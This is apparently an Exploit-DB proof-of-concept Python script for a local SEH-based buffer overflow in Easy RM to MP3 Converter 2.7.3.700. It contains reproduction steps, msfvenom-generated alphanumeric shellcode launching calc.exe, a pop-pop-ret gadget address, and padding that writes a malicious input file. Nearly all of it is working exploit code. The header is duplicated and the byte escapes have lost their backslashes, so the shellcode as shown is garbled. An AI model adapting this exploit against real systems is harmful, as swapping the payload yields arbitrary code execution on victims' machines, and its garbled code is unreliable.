# Date: 2020-03-26
# Author: Felipe Winsnes
# Software Link: https://www.exploit-db.com # Exploit Title: Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH)
# Date: 2020-03-26
# Author: Felipe Winsnes
# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe
# Version: 2.7.3.700
# Tested on: Windows 7 (x86)
# Proof of Concept:
# 1.- Run the python script, it will create a new file "poc.txt"
# 2.- Copy the content of the new file 'poc.txt' to clipboard
# 3.- Open the Application
# 4.- If the 'Preferences' windows pops up, just click 'Cancel'
# 4.- Click 'Batch'
# 5.- Delete everything on the parameter 'Input:' and paste the clipboard there
# 6.- Select OK
# 7.- Some Windows message boxes will pop up, click OK.
# 8.- Profit
# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/Easy-RM-to-MP3-Converter-2.7.3.700-Input/
import struct
import sys
# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread
# Payload size: 447 bytes
buf = b""
buf += b"xdbxc4xd9x74x24xf4x58x50x59x49x49x49x49"
buf += b"x49x49x49x49x49x43x43x43x43x43x43x43x37"
buf += b"x51x5ax6ax41x58x50x30x41x30x41x6bx41x41"
buf += b"x51x32x41x42x32x42x42x30x42x42x41x42x58"
buf += b"x50x38x41x42x75x4ax49x4bx4cx6bx58x4dx52"
buf += b"x55x50x73x30x67x70x55x30x6cx49x4ax45x65"
buf += b"x61x69x50x62x44x6cx4bx76x30x46x50x4ex6b"
buf += b"x76x32x46x6cx6cx4bx52x72x65x44x6ex6bx72"
buf += b"x52x74x68x44x4fx4fx47x73x7ax64x66x65x61"
buf += b"x49x6fx4ex4cx47x4cx50x61x71x6cx34x42x66"
buf += b"x4cx71x30x6bx71x58x4fx44x4dx46x61x68x47"
buf += b"x4ax42x6cx32x51x42x63x67x4cx4bx76x32x72"
buf += b"x30x4ex6bx33x7ax35x6cx4cx4bx50x4cx32x31"
buf += b"x31x68x59x73x53x78x55x51x6bx61x70x51x4e"
buf += b"x6bx70x59x47x50x35x51x68x53x6ex6bx51x59"
buf += b"x37x68x6ax43x45x6ax62x69x6cx4bx54x74x6c"
buf += b"x4bx55x51x4ax76x76x51x39x6fx6cx6cx6bx71"
buf += b"x4ax6fx36x6dx77x71x6ax67x77x48x69x70x33"
buf += b"x45x7ax56x64x43x61x6dx68x78x45x6bx53x4d"
buf += b"x66x44x53x45x69x74x70x58x4ex6bx76x38x74"
buf += b"x64x77x71x38x53x52x46x6ex6bx34x4cx72x6b"
buf += b"x6ex6bx56x38x45x4cx57x71x38x53x6cx4bx75"
buf += b"x54x6ex6bx76x61x4ax70x4ex69x67x34x44x64"
buf += b"x31x34x51x4bx73x6bx43x51x30x59x51x4ax53"
buf += b"x61x59x6fx49x70x31x4fx33x6fx63x6ax6cx4b"
buf += b"x57x62x68x6bx6cx4dx73x6dx42x4ax33x31x4c"
buf += b"x4dx4fx75x4ex52x73x30x35x50x47x70x66x30"
buf += b"x51x78x35x61x4ex6bx42x4fx6fx77x59x6fx58"
buf += b"x55x4fx4bx4dx30x35x4dx75x7ax65x5ax63x58"
buf += b"x49x36x4fx65x6dx6dx6dx4dx79x6fx79x45x45"
buf += b"x6cx77x76x33x4cx57x7ax4fx70x6bx4bx69x70"
buf += b"x74x35x57x75x6dx6bx33x77x65x43x43x42x62"
buf += b"x4fx32x4ax37x70x53x63x79x6fx6ax75x33x53"
buf += b"x35x31x72x4cx61x73x54x6ex61x75x61x68x75"
buf += b"x35x57x70x41x41"
nseh = struct.pack("<I", 0x06710870)
seh = struct.pack("<I", 0x10025A2E) # 0x10025a2e : pop ecx # pop esi # ret | ascii {PAGE_EXECUTE_READ} [MSRMfilter03.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:Program FilesEasy RM to MP3 ConverterMSRMfilter03.dll)
buffer = "A" * 9008 + nseh + seh + "x41x49" * 5 + buf + "xff" * 200
try:
f = open ("poc.txt", "w")
f.write(buffer)
f.close()
print "[+] The file has been created successfully!"
except:
print "[!] There has been an error while creating the file."